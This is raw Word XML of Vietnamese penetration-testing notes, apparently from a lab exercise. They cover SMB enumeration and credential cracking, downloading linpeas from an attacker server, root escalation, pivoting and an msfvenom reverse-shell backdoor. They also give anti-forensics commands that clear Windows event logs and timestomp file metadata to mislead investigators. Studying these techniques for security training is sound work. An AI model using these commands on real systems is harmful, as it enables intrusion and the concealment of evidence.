          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E4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30510" wp14:editId="2BC88C8F">
            <wp:extent cx="5943600" cy="7747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FB1A" w14:textId="77777777" w:rsidR="006A7619" w:rsidRDefault="006A7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9F2139" w14:textId="1E596C47" w:rsidR="000644F3" w:rsidRDefault="001B3960" w:rsidP="001B39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960">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>XÓA DẤU VẾT chứng cứ sau khi TẤN CÔNG HỢP PHÁP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299FF2AF" w14:textId="77777777" w:rsidR="002E7E7D" w:rsidRDefault="002E7E7D" w:rsidP="002E7E7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="FFFFFF"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2C2F37"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1384150F" w14:textId="6866A0A7" w:rsidR="002E7E7D" w:rsidRPr="002E7E7D" w:rsidRDefault="002E7E7D" w:rsidP="002E7E7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E7E7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dùng 2 lệnh sau để xóa window event log được sinh ra trong lúc tấn công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D42D5A6" w14:textId="48342534" w:rsidR="002E7E7D" w:rsidRPr="002E7E7D" w:rsidRDefault="002E7E7D" w:rsidP="002E7E7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E7E7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Clearev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAB3E33" w14:textId="782DEE6D" w:rsidR="002E7E7D" w:rsidRPr="002E7E7D" w:rsidRDefault="002E7E7D" w:rsidP="002E7E7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E7E7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run event_manager -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1520B70C" w14:textId="653717AE" w:rsidR="002E7E7D" w:rsidRDefault="002E7E7D" w:rsidP="002E7E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7E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CC3C75" wp14:editId="78381577">
            <wp:extent cx="4744112" cy="514421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5E15" w14:textId="5AE6FFC2" w:rsidR="00084688" w:rsidRDefault="000846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EE8E30" w14:textId="79E89ED4" w:rsidR="00105BCC" w:rsidRDefault="00084688" w:rsidP="000846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68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ỉnh sửa chứng cứ để qua mặt Security Analyst điều tra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C222512" w14:textId="74F51FB1" w:rsidR="00084688" w:rsidRDefault="00084688" w:rsidP="000846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CFC" w14:textId="77777777" w:rsidR="007659E3" w:rsidRDefault="007659E3" w:rsidP="0008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m metadata của file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACDC8C0" w14:textId="3418018D" w:rsidR="00084688" w:rsidRDefault="007659E3" w:rsidP="00084688">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007659E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>timestomp  c:\\wamp\\www\\testmysql.php -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18005AC3" w14:textId="6C54D40F" w:rsidR="007659E3" w:rsidRDefault="007659E3" w:rsidP="0008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è metadata của file khác vào file mình cần che dấu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D582456" w14:textId="29A86300" w:rsidR="007659E3" w:rsidRDefault="007659E3" w:rsidP="00084688">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007659E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>timestomp  c:\\wamp\\www\\testmysql.php -f  c:\\wamp\\www\\meterpreter.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEAD316" w14:textId="55936783" w:rsidR="007659E3" w:rsidRDefault="007659E3" w:rsidP="00084688">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765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B7635" wp14:editId="3DA3F24E">
            <wp:extent cx="5943600" cy="18592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E9E1" w14:textId="3E9DB7D0" w:rsidR="007659E3" w:rsidRDefault="007659E3" w:rsidP="0008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y đổi từng metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A17516" w14:textId="51588B25" w:rsidR="00F73C9D" w:rsidRDefault="00F73C9D" w:rsidP="00084688">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F73C9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>timestomp  c:\\wamp\\www\\testmysql.php -a "12/16/2020 12:00:17"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDEE15C" w14:textId="055E8688" w:rsidR="00F73C9D" w:rsidRDefault="00F73C9D" w:rsidP="0008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tự </w:t>
      </w:r>
      <w:r w:rsidR="00D5311E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-e, -c để thay đổi các phần còn lại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E9D585" w14:textId="453D72B1" w:rsidR="008F4180" w:rsidRDefault="00F73C9D" w:rsidP="00084688">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F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3963D" wp14:editId="273BDD18">
            <wp:extent cx="5943600" cy="163512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CDF6" w14:textId="77777777" w:rsidR="008F4180" w:rsidRDefault="008F4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F3D8A1" w14:textId="5FAC2237" w:rsidR="00327440" w:rsidRDefault="00327440" w:rsidP="008F4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MB ENUM </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2A1AF7" w14:textId="1B70D6E7" w:rsidR="00327440" w:rsidRDefault="00327440" w:rsidP="00327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4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6B665F" wp14:editId="14432CF8">
            <wp:extent cx="3762900" cy="259116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0B4" w14:textId="7204002D" w:rsidR="00D035CA" w:rsidRDefault="00D035CA" w:rsidP="00D035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AN SERVICE:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D035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C207FC" wp14:editId="39078EF4">
            <wp:extent cx="5943600" cy="498538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E2C7" w14:textId="1258F4CC" w:rsidR="00327440" w:rsidRDefault="00327440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AN HDH CỦA MÁY CLIENT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A528AB" w14:textId="77777777" w:rsidR="00660754" w:rsidRDefault="00327440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7440">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap --script smb-os-discovery.nse -sV 10.50.150.158</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781389EF" w14:textId="77777777" w:rsidR="00097322" w:rsidRDefault="00660754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7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34E98C" wp14:editId="2ED40F9A">
            <wp:extent cx="5943600" cy="327088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FEC" w14:textId="20566A77" w:rsidR="009A133D" w:rsidRDefault="00097322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um user thông qua rid: </w:t>
      </w:r>
      <w:r w:rsidRPr="00097322">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">enum4linux -r 10.50.150.158 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3A110D" w14:textId="77777777" w:rsidR="009D3FD8" w:rsidRDefault="00097322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3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5237FD" wp14:editId="4DC811DE">
            <wp:extent cx="5943600" cy="17373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44BA" w14:textId="19689358" w:rsidR="009D3FD8" w:rsidRDefault="009D3FD8" w:rsidP="009D3F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FD8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password policy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97322">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>enum4linux -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97322">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.50.150.158 </w:t>
      </w:r>
      <w:r w:rsidR="009A133D" w:rsidRPr="008147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E9680A" wp14:editId="24493601">
            <wp:extent cx="5334744" cy="217200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8929" w14:textId="5BAAC95D" w:rsidR="00D25638" w:rsidRDefault="00D25638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07BA90" w14:textId="77777777" w:rsidR="00EA58E7" w:rsidRDefault="00EA58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3558EB" w14:textId="77777777" w:rsidR="00EA58E7" w:rsidRDefault="005F7D48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t user list and detail:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00097322">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>enum4linux -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>U -d</w:t>
      </w:r>
      <w:r w:rsidRPr="00097322">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.50.150.158 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE5794B" w14:textId="77777777" w:rsidR="00F06E33" w:rsidRDefault="00EA58E7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8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558BB0" wp14:editId="5CFE8903">
            <wp:extent cx="5943600" cy="647446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94E3" w14:textId="77777777" w:rsidR="00F06E33" w:rsidRDefault="00F06E33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ừ cái này thấy được tài khoản 0 bị khóa, pass 0 hết hạn, có thể bruteforce được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7883050B" w14:textId="77777777" w:rsidR="00F06E33" w:rsidRDefault="00F06E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48C972" w14:textId="77777777" w:rsidR="00C66136" w:rsidRDefault="00C66136" w:rsidP="00C66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t share list: </w:t>
      </w:r>
      <w:r w:rsidRPr="00097322">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">enum4linux -r 10.50.150.158 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A9873F" w14:textId="4A0AAD02" w:rsidR="00327440" w:rsidRDefault="00C66136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1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C66238" wp14:editId="2E954AE9">
            <wp:extent cx="5943600" cy="2514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F9E0" w14:textId="305F39FE" w:rsidR="00612A69" w:rsidRDefault="00612A69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Ở đây share Josephine đáng chú ý. Có thể có khả năng truy cập 0 cần mk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF9DCEE" w14:textId="53B2376E" w:rsidR="00BD1FA5" w:rsidRDefault="00BD1FA5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ùng smbmap để xem quyền : </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1FA5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>smbmap -H 10.50.150.158</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7705657A" w14:textId="3AFFAC04" w:rsidR="00BD1FA5" w:rsidRDefault="00D75923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9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C27047" wp14:editId="3D247740">
            <wp:extent cx="5943600" cy="90614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6EC" w14:textId="77777777" w:rsidR="00C243BE" w:rsidRDefault="000B44AA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ờ chúng ta có thể xem được quyền smb</w:t>
      </w:r>
      <w:r w:rsidR="005713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348">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Có thể crack acc smb bằng: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D300B34" w14:textId="20698992" w:rsidR="00571348" w:rsidRDefault="00571348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348">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">crackmapexec smb 10.50.150.158   --shares -u </w:t>
      </w:r>
      <w:r w:rsidR="00C02111">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>‘’</w:t>
      </w:r>
      <w:r w:rsidRPr="00571348">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:r w:rsidR="00C02111">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>‘’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189E2CA4" w14:textId="49278F10" w:rsidR="005B090C" w:rsidRDefault="005B090C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09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FEB397" wp14:editId="19D631B9">
            <wp:extent cx="5943600" cy="1130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3CB2" w14:textId="2F30B187" w:rsidR="008250E9" w:rsidRDefault="008250E9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uy cập vào </w:t>
      </w:r>
      <w:r w:rsidR="00E27980">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>thư mụ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được share:</w:t>
      </w:r>
      <w:r w:rsidR="00555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0E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>smbclient //10.50.150.158/</w:t>
      </w:r>
      <w:r w:rsidR="00C02111">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pgNum/>
      </w:r>
      <w:r w:rsidR="00C02111">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>osephine</w:t>
      </w:r>
      <w:r w:rsidRPr="008250E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C07FFAE" w14:textId="682E0DEB" w:rsidR="00555EF3" w:rsidRDefault="00555EF3" w:rsidP="0032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5E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D8D91F" wp14:editId="3C748937">
            <wp:extent cx="5943600" cy="1499235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E49D" w14:textId="67948F38" w:rsidR="00327440" w:rsidRDefault="00C02111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u đó get file về</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49474377" w14:textId="328A6EA7" w:rsidR="00C02111" w:rsidRDefault="00C02111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1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61C97C" wp14:editId="41BCD573">
            <wp:extent cx="5943600" cy="222123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DBC2" w14:textId="273E451C" w:rsidR="00D035CA" w:rsidRDefault="00D035CA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ài khoản này có thể là tk ssh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEDF8F9" w14:textId="1E5C1C8E" w:rsidR="00CC6298" w:rsidRDefault="00CC6298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62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6E17F4" wp14:editId="03C7BC9A">
            <wp:extent cx="5943600" cy="262826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FA2F" w14:textId="2C73F83E" w:rsidR="007A0E1D" w:rsidRDefault="007A0E1D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u đó, tải linpeas về máy tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78072355" w14:textId="3F5951D1" w:rsidR="007A0E1D" w:rsidRDefault="007A0E1D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E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BEA930" wp14:editId="61D83AEC">
            <wp:extent cx="5943600" cy="990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3EB9" w14:textId="77777777" w:rsidR="007A0E1D" w:rsidRDefault="007A0E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A48FD9" w14:textId="4AD9851A" w:rsidR="007A0E1D" w:rsidRDefault="007A0E1D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ồi tạo web server: </w:t>
      </w:r>
      <w:r w:rsidRPr="007A0E1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>python -m SimpleHTTPServer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DFDB07" w14:textId="69367EA5" w:rsidR="007A0E1D" w:rsidRDefault="007A0E1D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E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A5738E" wp14:editId="684EF2D6">
            <wp:extent cx="5858693" cy="905001"/>
            <wp:effectExtent l="0" t="0" r="889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9A7F" w14:textId="32674C1F" w:rsidR="00D035CA" w:rsidRDefault="00680E8D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ên máy ssh thì rồi wget tải linpeas từ máy tấn công về</w:t>
      </w:r>
      <w:r w:rsidR="0066393B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> rồi chạy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A121182" w14:textId="07F3E373" w:rsidR="00680E8D" w:rsidRDefault="0066393B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9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A4D1F9" wp14:editId="59F05011">
            <wp:extent cx="5943600" cy="34874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9B75" w14:textId="77777777" w:rsidR="00954333" w:rsidRDefault="009543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695971" w14:textId="3AF6695B" w:rsidR="00385A78" w:rsidRDefault="00385A78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ìm thấy được khá nhiều thứ có thể khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E07C32" w14:textId="533ABA5F" w:rsidR="00385A78" w:rsidRDefault="00385A78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A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078922" wp14:editId="23E63232">
            <wp:extent cx="5943600" cy="47675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B6D1" w14:textId="69341004" w:rsidR="009E382A" w:rsidRDefault="009E382A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ài này dễ nên sẽ dùng cách đơn giản hơn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D575F52" w14:textId="1EF679AF" w:rsidR="009E382A" w:rsidRDefault="009E382A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8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1BBABF" wp14:editId="59795674">
            <wp:extent cx="5943600" cy="168656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682" w14:textId="77777777" w:rsidR="00AD1234" w:rsidRDefault="00AD12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6E45F" w14:textId="5C04D5D6" w:rsidR="009E382A" w:rsidRDefault="00AD1234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ó tài khoản root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56131507" w14:textId="63F8B493" w:rsidR="00AD1234" w:rsidRDefault="00AD1234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2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CBF4FA" wp14:editId="698986CA">
            <wp:extent cx="5943600" cy="234251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3D" w14:textId="3CD5AEC0" w:rsidR="00B11031" w:rsidRDefault="00B11031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ên quyền root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9DDB35" w14:textId="5ABC9607" w:rsidR="00B11031" w:rsidRDefault="00B11031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0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D46FED" wp14:editId="6B1F3F87">
            <wp:extent cx="5943600" cy="13614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3C2D" w14:textId="77777777" w:rsidR="00B11031" w:rsidRDefault="00B11031" w:rsidP="00C021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2A93B" w14:textId="77777777" w:rsidR="00510E2E" w:rsidRDefault="00510E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470FFE" w14:textId="194577D3" w:rsidR="007659E3" w:rsidRDefault="008F4180" w:rsidP="0051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180">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PIVOTING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD81A64" w14:textId="77777777" w:rsidR="00C8117D" w:rsidRDefault="00C8117D" w:rsidP="00C811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E9A00" w14:textId="71D56B09" w:rsidR="008F4180" w:rsidRDefault="001B100A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00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46B9B9" wp14:editId="7D8EFEE4">
            <wp:extent cx="5943600" cy="25031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1C00" w14:textId="42F1C5FE" w:rsidR="001B100A" w:rsidRDefault="001B100A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u khi biết có vcms thì search trên msf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504567B5" w14:textId="4618D22A" w:rsidR="001B100A" w:rsidRDefault="001B100A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00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FEC7AE0" wp14:editId="0F880A32">
            <wp:extent cx="5943600" cy="23507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2798" w14:textId="77777777" w:rsidR="00FD01DE" w:rsidRDefault="00FD01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923150" w14:textId="1021EA67" w:rsidR="00FD01DE" w:rsidRDefault="00FD01DE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o thang nếu chiếm quyền thấp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E1A4E4" w14:textId="00A7AD19" w:rsidR="00061102" w:rsidRDefault="00FD0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1D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C5B7BF" wp14:editId="6EBAD247">
            <wp:extent cx="5943600" cy="319151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B09" w14:textId="4BFF4E4C" w:rsidR="00BB2761" w:rsidRDefault="00BB27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276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768ED84" wp14:editId="6EF2D552">
            <wp:extent cx="5943600" cy="78232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A01D" w14:textId="45B0A579" w:rsidR="007B1FF2" w:rsidRDefault="007B1F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FF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4C8E861" wp14:editId="4A878769">
            <wp:extent cx="5934903" cy="5915851"/>
            <wp:effectExtent l="0" t="0" r="889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230E" w14:textId="397A6E2E" w:rsidR="005B7B2A" w:rsidRDefault="005B7B2A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em ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C267C3A" w14:textId="270B89C0" w:rsidR="005B7B2A" w:rsidRDefault="00895CB8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5CB8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7BDAF03" wp14:editId="7571BA78">
            <wp:extent cx="5943600" cy="38169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FD93" w14:textId="77777777" w:rsidR="00956056" w:rsidRDefault="00956056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B063D8" w14:textId="0BBE8EA5" w:rsidR="00895CB8" w:rsidRDefault="00625989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oute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C43E96E" w14:textId="1C19C1A6" w:rsidR="00625989" w:rsidRDefault="00625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598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D3819F5" wp14:editId="47579382">
            <wp:extent cx="5943600" cy="2985135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0731" w14:textId="104AAFB8" w:rsidR="00625989" w:rsidRDefault="00625989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ến hành scan các port trên network mới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEB8246" w14:textId="12ED0C4E" w:rsidR="008D770C" w:rsidRDefault="00FB3D34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D3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374C24D" wp14:editId="6ADF487E">
            <wp:extent cx="5943600" cy="27736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1772" w14:textId="77777777" w:rsidR="002E32F0" w:rsidRDefault="002E32F0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C62BE" w14:textId="77777777" w:rsidR="002E32F0" w:rsidRDefault="002E32F0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12BA6" w14:textId="77777777" w:rsidR="002E32F0" w:rsidRDefault="002E32F0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8FA97" w14:textId="77777777" w:rsidR="002E32F0" w:rsidRDefault="002E32F0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8D1DC" w14:textId="77777777" w:rsidR="002E32F0" w:rsidRDefault="002E32F0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7DA8B" w14:textId="77777777" w:rsidR="002E32F0" w:rsidRDefault="002E32F0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DC090" w14:textId="1E47A669" w:rsidR="00FB3D34" w:rsidRDefault="00FB3D34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ạo portfw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2988FEA6" w14:textId="4B4A7865" w:rsidR="002A662B" w:rsidRDefault="00FB3D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D3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6B784F" wp14:editId="7F4AD0E9">
            <wp:extent cx="5943600" cy="27139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F4B5" w14:textId="4D149445" w:rsidR="007F225A" w:rsidRDefault="007F225A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an service vào khai khác </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2779C457" w14:textId="069F09A1" w:rsidR="007F225A" w:rsidRDefault="007F225A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225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69111AD" wp14:editId="152871E5">
            <wp:extent cx="5943600" cy="3144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06FC" w14:textId="3C0BAA8E" w:rsidR="0027525A" w:rsidRDefault="0027525A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AEFD4" w14:textId="1E39EA07" w:rsidR="0011085B" w:rsidRDefault="0011085B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ẠO SHELL VỚI MSFVENOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED3E097" w14:textId="0B91A123" w:rsidR="0011085B" w:rsidRDefault="0011085B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8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795857" wp14:editId="2263E69E">
            <wp:extent cx="5943600" cy="1610995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BD75" w14:textId="3CE0B395" w:rsidR="00AE1337" w:rsidRDefault="006833B3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Ề REVERSE_TCP LÀ STAGED PAYLOAD. VÌ VẬY CẦN THÊM 1 LISTENER RIÊNG.</w:t>
      </w:r>
      <w:r w:rsidR="0036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337">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tham khảo hình dưới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135628FC" w14:textId="190665DC" w:rsidR="00AE1337" w:rsidRDefault="00AE1337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33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57E787F" wp14:editId="19064359">
            <wp:extent cx="5943600" cy="1478915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63F9" w14:textId="77777777" w:rsidR="00C64A02" w:rsidRDefault="00C64A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DF78B4" w14:textId="058888C3" w:rsidR="006833B3" w:rsidRDefault="00401733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u đó, c</w:t>
      </w:r>
      <w:r w:rsidR="00364D45">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hạy file backdoor vừa tạo để lấy reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6057FD83" w14:textId="39171F71" w:rsidR="001964E6" w:rsidRDefault="001964E6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60E98E1" wp14:editId="4AEE6568">
            <wp:extent cx="5943600" cy="18243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F470" w14:textId="7E55B5E5" w:rsidR="00DC32D8" w:rsidRDefault="00DC32D8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geless như hình dưới thì netcat có thể bắt được. còn staged thì nc không bắt được.</w:t>
      </w:r>
